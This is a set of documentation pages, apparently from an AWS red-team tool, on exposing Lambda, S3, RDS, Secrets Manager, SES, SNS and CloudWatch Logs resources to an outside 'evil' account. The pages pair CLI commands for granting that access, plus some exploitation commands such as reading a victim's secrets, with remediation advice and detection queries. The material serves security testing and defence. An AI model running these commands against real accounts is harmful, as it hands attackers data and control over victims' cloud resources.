Existing Exploitation tools such as [Pacu](https://github.com/RhinoSecurityLabs/pacu) have capabilities that help attackers exploit compromised Lambda functions. Pacu, for example, has modules that leverage Lambda functions to [backdoor new IAM roles](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_roles), to [modify security groups](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_sec_groups), and to [create new IAM users](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_users). As such, Lambda functions are high-value targets to attackers, and existing exploitation frameworks such as Pacu and others increase the likelihood for abuse when a Lambda function is compromised.
## Steps to Reproduce
* **Option 1**: To expose the Lambda function using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda --name test-resource-exposure
```
* **Option 2**: To expose the Lambda Function using AWS CLI, run the following from the victim account:
```bash
export EVIL_PRINCIPAL_ACCOUNT=999988887777
aws lambda add-permission \
--function-name test-resource-exposure \
--action lambda:* \
--statement-id Endgame \
--principal $EVIL_PRINCIPAL_ACCOUNT
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws lambda get-policy --function-name test-resource-exposure
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "999988887777"
},
"Action": [
"lambda:*"
],
"Resource": "arn:aws:lambda:us-east-1:111122223333:test-resource-exposure"
}
]
}
```
## Exploitation
* Authenticate to the `evil` account (In this example, `arn:aws:iam::999988887777:user/evil`)
* Run the following command to invoke the function in the victim account:
```bash
export VICTIM_LAMBDA=arn:aws:lambda:us-east-1:111122223333:test-resource-exposure
aws lambda invoke --function-name $VICTIM_LAMBDA
```
* Observe that the output resembles the following:
```json
{
"ExecutedVersion": "$LATEST",
"StatusCode": 200
}
```
## Remediation
* **Trusted Accounts Only**: Ensure that cross-account Lambda functions allow access only to trusted accounts to prevent unknown function invocation requests
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Functions. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Lambda Functions**: Tightly control access to the following IAM actions:
- [lambda:AddPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html): _Grants permission to give an AWS service or another account permission to use an AWS Lambda function_
- [lambda:GetPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetPolicy.html): _Grants permission to view the resource-based policy for an AWS Lambda function, version, or alias_
- [lambda:InvokeFunction](https://docs.aws.amazon.com/lambda/latest/dg/API_Invoke.html): _Grants permission to invoke an AWS Lambda function_
- [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
- [lambda:RemovePermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemovePermission.html): _Grants permission to revoke function-use permission from an AWS service or another account_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='lambda.amazonaws.com' and eventName like 'AddPermission'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='lambda.amazonaws.com' and (eventName like 'AddPermission' and requestParameters.statementId='Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [aws lambda add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
* [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)

View File

@ -0,0 +1,66 @@
# Lambda Layers
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda-layer --name test-resource-exposure:1
```
* To view the contents of the Lambda layer policy, run the following:
```bash
export VICTIM_RESOURCE_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure
export VERSION=3
aws lambda get-layer-version-policy \
--layer-name $VICTIM_RESOURCE_ARN \
--version-number $VERSION
```
* Observe that the output of the overly permissive Lambda Layer Policy resembles the example shown below.
## Example
Observe that the Evil principal's account ID (`999988887777`) is given `lambda:GetLayerVersion` access to the Lambda layer `arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1`.
```json
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
"RevisionId": ""
}
```
## Exploitation
```
TODO
```
## Remediation
* **Trusted Accounts Only**: Ensure that Lambda Layers are only shared with trusted accounts.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Lambda Layers**: Tightly control access to the following IAM actions:
- [lambda:AddLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddLayerVersionPermission.html): _Grants permission to add permissions to the resource-based policy of a version of an AWS Lambda layer_
- [lambda:GetLayerVersionPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetLayerVersionPolicy.html): _Grants permission to view the resource-based policy for a version of an AWS Lambda layer_
- [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
- [lambda:ListLayers](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayers.html): _Grants permission to retrieve a list of AWS Lambda layers, with details about the latest version of each layer_
- [lambda:ListLayerVersions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayerVersions.html): _Grants permission to retrieve a list of versions of an AWS Lambda layer_
- [lambda:RemoveLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemoveLayerVersionPermission.html): _Grants permission to remove a statement from the permissions policy for a version of an AWS Lambda layer_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## References
* [aws lambda add-layer-version-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-layer-version-permission.html)
* [aws lambda get-layer-version-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/get-layer-version-policy.html)
* [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)

66
docs/risks/logs.md Normal file
View File

@ -0,0 +1,66 @@
# CloudWatch Logs Resource Policies
CloudWatch Resource Policies allow other AWS services or IAM Principals to put log events into the account.
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service cloudwatch --name test-resource-exposure
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws logs describe-resource-policies
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"resourcePolicies": [
{
"policyName": "test-resource-exposure",
"policyDocument": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":[\"logs:PutLogEventsBatch\",\"logs:PutLogEvents\",\"logs:CreateLogStream\"],\"Resource\":\"arn:aws:logs:*\"}]}",
"lastUpdatedTime": 1613244111319
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that CloudWatch Logs access is only shared with trusted accounts, and that the trusted accounts truly need access to write to the CloudWatch Logs.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposing write access to your CloudWatch Logs**: Tightly control access to the following IAM actions:
- [logs:PutResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutResourcePolicy.html): _Creates or updates a resource policy allowing other AWS services to put log events to this account_
- [logs:DeleteResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteResourcePolicy.html): _Deletes a resource policy from this account. This revokes the access of the identities in that policy to put log events to this account._
- [logs:DescribeResourcePolicies](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DescribeResourcePolicies.html): _Lists the resource policies in this account._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## References
* [CloudWatch Logs Resource Policies](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/iam-access-control-overview-cwl.html)
* [API Documentation: PutResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutResourcePolicy.html)
* [aws logs put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
* [aws logs describe-resource-policy](https://docs.aws.amazon.com/cli/latest/reference/logs/describe-resource-policies.html)

View File

@ -0,0 +1,85 @@
# RDS Snapshots
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service rds --name test-resource-exposure
```
* To view a list of the AWS Accounts that have access to the RDS DB Snapshot, run the following command from the victim account:
```bash
aws rds describe-db-snapshot-attributes \
--db-snapshot-identifier test-resource-exposure
```
## Example
* Observe that the account ID of the evil principal (`999988887777`) is listed alongside the AttributeName called `restore`. This means that the evil account ID is able to restore the snapshot of the RDS database in their own account.
```json
{
"DBSnapshotAttributesResult": {
"DBSnapshotIdentifier": "test-resource-exposure",
"DBSnapshotAttributes": [
{
"AttributeName": "restore",
"AttributeValues": [
"999988887777"
]
}
]
}
}
```
## Exploitation
After the RDS snapshot is public or shared with the rogue user account, an attacker can then:
* [copy the snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_CopySnapshot.html#USER_CopyDBSnapshot)
* [Restore a DB Instance from the DB Snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.RestoringFromSnapshot.html)
* Browse the contents of the database, potentially revealing sensitive or otherwise non-public information.
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all Snapshots with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that RDS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the RDS Snapshots.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your RDS Snapshots**: Tightly control access to the following IAM actions:
- [rds:DescribeDbClusterSnapshotAttributes](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBClusterSnapshotAttributes.html): _Grants permission to return a list of DB cluster snapshot attribute names and values for a manual DB cluster snapshot. This includes information on which AWS Accounts have access to the snapshot._
- [rds:DescribeDbClusterSnapshots](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBClusterSnapshots.html): _Grants permission to return information about DB cluster snapshots._
- [rds:DescribeDbSnapshotAttributes](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBSnapshotAttributes.html): _Grants permission to return a list of DB snapshot attribute names and values for a manual DB snapshot. This includes information on which AWS Accounts have access to the snapshot._
- [rds:DescribeDbSnapshots](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBSnapshots.html): _Grants permission to return information about DB snapshots_
- [rds:ModifyDBSnapshotAttribute](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBSnapshotAttribute.html): _Grants permission to add an attribute and values to, or removes an attribute and values from, a manual DB snapshot. This includes the ability to share snapshots with other AWS Accounts._
- [rds:ModifyDBClusterSnapshotAttribute](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBClusterSnapshotAttribute.html): _Grants permission to add an attribute and values to, or removes an attribute and values from, a manual DB cluster snapshot. This includes the ability to share snapshots with other AWS Accounts._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='rds.amazonaws.com' AND (eventName='ModifyDBSnapshotAttribute' or eventName='ModifyDBClusterSnapshotAttribute' and requestParameters.attributeName='restore')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws rds modify-db-cluster-snapshot-attribute](https://docs.aws.amazon.com/cli/latest/reference/rds/modify-db-cluster-snapshot-attribute.html)
- [aws rds modify-db-snapshot-attribute](https://docs.aws.amazon.com/cli/latest/reference/rds/modify-db-snapshot-attribute.html)
- [aws rds describe-db-snapshot-attributes](https://docs.aws.amazon.com/cli/latest/reference/rds/describe-db-snapshot-attributes.html)

77
docs/risks/s3.md Normal file
View File

@ -0,0 +1,77 @@
# S3 Buckets
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:evil
endgame expose --service s3 --name test-resource-exposure
```
* To verify that the S3 bucket has been shared with the public, run the following from the victim account:
```bash
aws s3api get-bucket-policy --bucket test-resource-exposure
```
* Observe that the contents match the example shown below.
## Example
The response of the `get-bucket-policy` command will return the below. Observe how the Evil Principal (`arn:aws:iam::999988887777:evil`) is granted full access to the S3 bucket.
```json
{
"Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:evil\"},\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::test-resource-exposure\",\"arn:aws:s3:::test-resource-exposure/*\"]}]}"
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that S3 Buckets are only shared with trusted accounts, and that the trusted accounts truly need access to the S3 Bucket.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your S3 Buckets**: Tightly control access to the following IAM actions:
- [s3:GetBucketPolicy](https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketPolicy.html): _Grants permission to return the policy of the specified bucket. This includes information on which AWS accounts and principals have access to the bucket._
- [s3:ListAllMyBuckets](https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListBuckets.html): _Grants permission to list all buckets owned by the authenticated sender of the request_
- [s3:PutBucketPolicy](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketPolicy.html): _Grants permission to add or replace a bucket policy on a bucket._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='s3.amazonaws.com' AND eventName='PutBucketPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='s3.amazonaws.com' AND (eventName='PutBucketPolicy' and @message like 'Endgame')
```
(More specific queries related to the policy contents do not work due to how CWL parses the requestParameters object on these calls)
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws s3api put-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-policy.html)
- [aws s3api get-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html)

View File

@ -0,0 +1,119 @@
# Secrets Manager
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* **Option 1**: To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service secretsmanager --name test-resource-exposure
```
* **Option 2**: To expose the resource using AWS CLI, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
export EVIL_POLICY='{"Version": "2012-10-17", "Statement": [{"Sid": "AllowCurrentAccount", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/evil"}, "Action": "secretsmanager:*", "Resource": ["arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"]}]}'
aws secretsmanager put-resource-policy --secret-id --resource-policy $EVIL_POLICY
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws secretsmanager get-resource-policy --secret-id test-resource-exposure
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "secretsmanager:*",
"Resource": [
"arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"
]
}
]
}
```
## Exploitation
* Authenticate to the `evil` account (In this example, `arn:aws:iam::999988887777:user/evil`)
* Run the following command in the victim account:
```bash
export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
aws secretsmanager get-secret-value --secret-id $VICTIM_RESOURCE
```
* Observe that the output resembles the following:
```json
{
"ARN": "arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure",
"Name": "test-resource-exposure",
"VersionId": "DOGECOIN",
"SecretString": "{\n \"username\":\"doge\",\n \"password\":\"coin\"\n}\n",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": 1523477145.713
}
```
## Remediation
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that Secrets Manager secrets are only shared with trusted accounts, and that the trusted accounts truly need access to the secret.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Secrets Manager secrets. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-secrets-manager) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Secrets**: Tightly control access to the following IAM actions:
- [secretsmanager:PutResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_PutResourcePolicy.html): _Enables the user to attach a resource policy to a secret._
- [secretsmanager:GetSecretValue](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html): _Enables the user to retrieve and decrypt the encrypted data._
- [secretsmanager:DeleteResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_DeleteResourcePolicy.html): _Enables the user to delete the resource policy attached to a secret._
- [secretsmanager:GetResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetResourcePolicy.html): _Enables the user to get the resource policy attached to a secret._
- [secretsmanager:ListSecrets](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_ListSecrets.html): _Enables the user to list the available secrets._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='secretsmanager.amazonaws.com' AND (eventName='PutResourcePolicy' or eventName='DeleteResourcePolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='secretsmanager.amazonaws.com' AND (eventName='PutResourcePolicy' and requestParameters.resourcePolicy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [aws secretsmanager get-resource-policy](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-resource-policy.html)
* [aws secretsmanager get-secret-value](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-secret-value.html)
* [aws secretsmanager put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)

105
docs/risks/ses.md Normal file
View File

@ -0,0 +1,105 @@
# SES Sender Authorization Policies
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
SES Sending Authorization Policies can be used to add a rogue IAM user as a [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html). This can result in a malicous user sending an email on behalf of your organization, which could lead to phishing attacks against customers or employees, as well as a loss of consumer trust and reputation loss.
### How it works
Sending authorization is based on sending authorization policies. If you want to enable a delegate sender to send on your behalf, you create a sending authorization policy and associate the policy to your identity by using the Amazon SES console or the Amazon SES API.
When Amazon SES receives the request to send the email, it checks your identity's policy (if present) to determine if you have authorized **the delegate sender** to send on the identity's behalf. If the delegate sender is authorized, Amazon SES accepts the email.
This can be abused by adding a rogue user as a [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html).
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service ses --name test-resource-exposure.com
```
* To verify that the sender authorization policy has been set to allow actions from the rogue user, run the following command from the victim account:
```bash
aws ses list-identity-policies --identity test-resource-exposure.com
```
The command above will return the following:
```bash
{
"PolicyNames": [
"Endgame"
]
}
```
* Take the response from the command above - `Endgame` - and list the policy name in the command below
```bash
aws ses get-identity-policies --identity test-resource-exposure.com --policy-names "Endgame"
```
* Observe that the contents match the example shown below
## Example
The policy below allows the Evil Principal (`arn:aws:iam::999988887777:user/evil` access to `ses:*` to the victim resource (`arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com`), indicating a successful compromise.
```json
{
"Policies": {
"Endgame": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:user/evil\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"}]}"
}
}
```
## Exploitation
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool.
* **Trusted Accounts Only**: Ensure that SES Authorization Policies only authorize specific delegate senders according to your design.
* **Ensure access is necessary**: For any delegate senders that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to manipulation of your SES Sender Authorization Policies**: Tightly control access to the following IAM actions:
- [ses:PutIdentityPolicy](https://docs.aws.amazon.com/ses/latest/APIReference/API_PutIdentityPolicy.html): _Adds or updates a sending authorization policy for the specified identity (an email address or a domain)_
- [ses:DeleteIdentityPolicy](https://docs.aws.amazon.com/ses/latest/APIReference/API_DeleteIdentityPolicy.html): _Deletes the policy associated with the identity_
- [ses:GetIdentityPolicies](https://docs.aws.amazon.com/ses/latest/APIReference/API_GetIdentityPolicies.html): _Returns the requested sending authorization policies for the given identity (an email address or a domain)_
- [ses:ListIdentities](https://docs.aws.amazon.com/ses/latest/APIReference/API_ListIdentities.html): _Returns a list containing all of the identities (email addresses and domains) for your AWS account, regardless of verification status _
- [ses:ListIdentityPolicies](https://docs.aws.amazon.com/ses/latest/APIReference/API_ListIdentityPolicies.html): _Returns a list of sending authorization policies that are attached to the given identity (an email address or a domain)_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' or eventName='DeleteIdentityPolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' and requestParameters.policyName='Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-identity-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ses/put-identity-policy.html)
* [Sending Authorization Overview](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-overview.html)
* [Sending Authorization Policy Examples](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-policy-examples.html)
* [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html)

109
docs/risks/sns.md Normal file
View File

@ -0,0 +1,109 @@
# SNS Topics
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service sns --name test-resource-exposure
```
* To verify that the SNS topic has been shared with the evil principal, run the following from the victim account:
```bash
export VICTIM_RESOURCE=arn:aws:sns:us-east-1:111122223333:test-resource-exposure
aws sns get-topic-attributes \
--topic-arn $VICTIM_RESOURCE
```
* Observe that the contents match the example shown below.
## Example
The output will have the following structure:
```json
{
"Attributes": {
"SubscriptionsConfirmed": "1",
"DisplayName": "my-topic",
"SubscriptionsDeleted": "0",
"EffectiveDeliveryPolicy": "",
"Owner": "111122223333",
"Policy": "SeeBelow",
"TopicArn": "arn:aws:sns:us-east-1:111122223333:test-resource-exposure",
"SubscriptionsPending": "0"
}
}
```
The prettified version of the `Policy` key is below. Observe how the content of the policy grants the evil principal's account ID (`999988887777`) maximum access to the SNS topic.
```json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
